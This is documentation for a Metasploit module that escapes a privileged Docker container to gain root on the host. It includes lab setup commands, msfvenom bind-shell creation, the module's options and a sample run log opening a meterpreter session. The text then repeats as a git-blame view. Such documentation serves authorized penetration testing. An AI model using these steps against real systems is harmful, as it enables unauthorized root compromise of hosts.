documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md

## Vulnerable Application

Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on rebase feature.

Both meterpreter shell and classic shell are supported. The exploit will copy a payload to a writable directory in the container and then escape the container and either search for the payload on the file system or copy it directly from the container and then execute it on the host. 

# Creating A Testing Environment

- Install Docker
- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)
```bash
docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu
```
- Obtain a shell on the container with metasploit. One possible option is:
```bash
# Create a bind shell using msfvenom
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin
# Copy bind shell into container
docker cp ./bind4444.bin test-vuln-container:/bind4444.bin
# Execute bind shell in the container
docker exec -it test-vuln-container /bind4444.bin
```
- Connect to this bind shell in metasploit
```bash
use multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 127.0.0.1
set lport 4444
run
```

## Verification Steps

1. `use exploit/linux/local/docker_privileged_container_escape`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
4. `set LHOST [lhost]`
5. `set LPORT [lport]`
6. `exploit`

## Options

## PAYLOAD

Set this option to choose which type of root session you want to create.

## ForceExploit

Force exploit even if the current session does not appear to be in a docker container, or the container does not appear vulnerable.

## ForcePayloadSearch

Force the exploit to search for the payload in the file system rather than copying out of the docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located in the `/var/lib/docker/overlay2/` directory.

## WritableContainerDir

A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container.

## WritableHostDir

A directory where we can write files on the host (default is /tmp). This is needed to copy the payload from the container onto the host. Alternatively see ForcePayloadSearch

# Scenarios

## Container Escape starting with a meterpreter shell

```
msf exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape
msf exploit(linux/local/lxc_privilege_escalation) > set session 1
session => 1
msf exploit(linux/local/lxc_privilege_escalation) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Writing payload executable to '/tmp/aLQdBKpMXLo'
[*] Executing script to exploit privileged container
[*] Sending stage (3012516 bytes) to 192.168.0.231
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
```
Added docker priviledged container escape 2020-07-25 12:14:30 +01:00			`## Vulnerable Application`

Typos in readme 2020-07-25 12:17:56 +01:00			`Docker Privileged Container Escape that obtains root on the host machine by abusing the Linux cgroup notification on rebase feature.`
Added docker priviledged container escape 2020-07-25 12:14:30 +01:00
			`Both meterpreter shell and classic shell are supported. The exploit will copy a payload to a writable directory in the container and then escape the container and either search for the payload on the file system or copy it directly from the container and then execute it on the host.`

			`# Creating A Testing Environment`

			`- Install Docker`
			`- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)`
			```bash
			`docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu`
			```
			`- Obtain a shell on the container with metasploit. One possible option is:`
			```bash
			`# Create a bind shell using msfvenom`
			`msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin`
			`# Copy bind shell into container`
			`docker cp ./bind4444.bin test-vuln-container:/bind4444.bin`
			`# Execute bind shell in the container`
			`docker exec -it test-vuln-container /bind4444.bin`
			```
			`- Connect to this bind shell in metasploit`
			```bash
			`use multi/handler`
			`set payload linux/x64/meterpreter/bind_tcp`
			`set rhost 127.0.0.1`
			`set lport 4444`
			`run`
			```

			`## Verification Steps`

			1. `use exploit/linux/local/docker_privileged_container_escape`
			2. `set SESSION [session]`
			3. `set PAYLOAD [payload]`
			4. `set LHOST [lhost]`
			5. `set LPORT [lport]`
			6. `exploit`

			`## Options`

			`## PAYLOAD`

			`Set this option to choose which type of root session you want to create.`

			`## ForceExploit`

			`Force exploit even if the current session does not appear to be in a docker container, or the container does not appear vulnerable.`

			`## ForcePayloadSearch`

			Force the exploit to search for the payload in the file system rather than copying out of the docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located in the `/var/lib/docker/overlay2/` directory.

			`## WritableContainerDir`

			`A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container.`

Update documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md 2020-07-26 09:43:58 +01:00			`## WritableHostDir`
Added docker priviledged container escape 2020-07-25 12:14:30 +01:00
			`A directory where we can write files on the host (default is /tmp). This is needed to copy the payload from the container onto the host. Alternatively see ForcePayloadSearch`

			`# Scenarios`

			`## Container Escape starting with a meterpreter shell`

			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape`
			`msf exploit(linux/local/lxc_privilege_escalation) > set session 1`
Added docker priviledged container escape 2020-07-25 12:14:30 +01:00			`session => 1`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(linux/local/lxc_privilege_escalation) > run`
Added docker priviledged container escape 2020-07-25 12:14:30 +01:00
			`[*] Started reverse TCP handler on 10.0.2.15:4444`
			`[*] Writing payload executable to '/tmp/aLQdBKpMXLo'`
			`[*] Executing script to exploit privileged container`
			`[*] Sending stage (3012516 bytes) to 192.168.0.231`
			`[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100`
			```